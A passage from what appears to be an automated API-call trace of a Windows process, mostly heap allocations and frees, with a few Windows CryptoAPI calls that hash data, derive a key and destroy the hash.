hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0227.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0227.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0227.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0227.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0227.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e514c0 [0227.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e514c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0227.738] CryptHashData (hHash=0xa87050, pbData=0x2e55008, dwDataLen=0x3, dwFlags=0x1) returned 1 [0227.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0227.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0227.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0227.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0227.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0227.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0227.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0227.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0227.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0227.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0227.749] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0227.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0227.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0227.750] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0227.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0227.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0227.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0227.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0227.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0227.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0227.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0227.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.751] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0227.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0227.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0227.751] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0227.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0227.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0227.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0227.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0227.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0227.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0227.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0227.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0227.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0227.752] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0227.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0227.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51340, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0227.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0227.753] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0227.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0227.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.753] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87410) returned 1 [0227.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0227.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.754] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0227.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.754] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0227.754] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0227.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0227.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0227.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0227.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0227.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0227.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0227.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0227.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0227.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a68 [0227.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0227.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0227.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0227.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0227.755] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0227.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0227.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0227.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0227.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0227.755] CryptDestroyHash (hHash=0xa87050) returned 1 [0227.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0227.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0227.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0227.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0227.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0227.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0227.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0227.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0227.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0227.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0227.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0227.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0227.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0227.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0227.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0227.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0227.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0227.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: 